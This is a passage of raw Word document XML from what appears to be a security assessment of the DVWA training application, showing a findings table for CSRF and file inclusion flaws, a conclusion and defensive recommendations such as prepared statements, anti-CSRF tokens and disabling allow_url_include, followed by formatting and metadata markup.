          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C2410C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:color w:val="15803D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fixed (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Session-bound Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C2410C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:color w:val="15803D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommendation issued</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Allow-list (not built into DVWA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00923145">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:color w:val="15803D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommendation issued</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2550" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>allow_url_include disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Conclusion &amp; Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This assessment confirmed that DVWA's Low security configuration is vulnerable to all s</w:t>
      </w:r>
      <w:r>
        <w:t>ix tested OWASP Top 10 attack classes, and that DVWA's High security configuration successfully mitigates SQL Injection, both forms of XSS, and CSRF through prepared statements, input validation, Content Security Policy, and session-bound tokens respective</w:t>
      </w:r>
      <w:r>
        <w:t>ly. File Inclusion vulnerabilities (LFI/RFI) were successfully exploited and are best addressed through secure coding practice (allow-listing) and secure server configuration (disabling allow_url_include) rather than a DVWA-provided code fix.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendatio</w:t>
      </w:r>
      <w:r>
        <w:t>ns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Always use parameterized queries / prepared statements for any database interaction involving user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Apply output encoding and input validation consistently, and enforce a strict Content-Security-Policy header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Implement anti-CSRF tokens on all state-changing requests (forms and APIs alike).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Never pass raw user input into file-system or include() functions; use allow-lists mapped to safe filenames.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Keep allow_url_include and allow_url_fopen disabled in production</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy standard security headers (CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy) on all web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00923145" w:rsidRDefault="009F724C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct periodic manual testing with tools such as Burp Suite in addition to automated scanning.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009231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919CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09B232F6"/>
    <w:lvl w:ilvl="0" w:tplc="60A4CDC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0DEEE630">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4AD65A52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9054515A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7D6624AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="352660F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E5905458">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="244CC49C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="516044B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C6D22A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="934C759C"/>
    <w:lvl w:ilvl="0" w:tplc="5B043756">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="260"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2586001A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4A84FB12">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="69D20924">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FF921E8E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="717ADEA8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="97B8DF7C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3842CB7C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FDD8DB2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145"/>
    <w:rsid w:val="005167E5"/>
    <w:rsid w:val="00923145"/>
    <w:rsid w:val="009F7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D8081"/>
  <w15:docId w15:val="{6B80CD95-F6C5-4DE7-BED2-29F69F537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2563EB"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="150"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F2937"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F2937"/>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E2549-E31F-457C-B2A8-147636116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2636</Words>
  <Characters>15027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2026-09-26T07:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-26T07:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>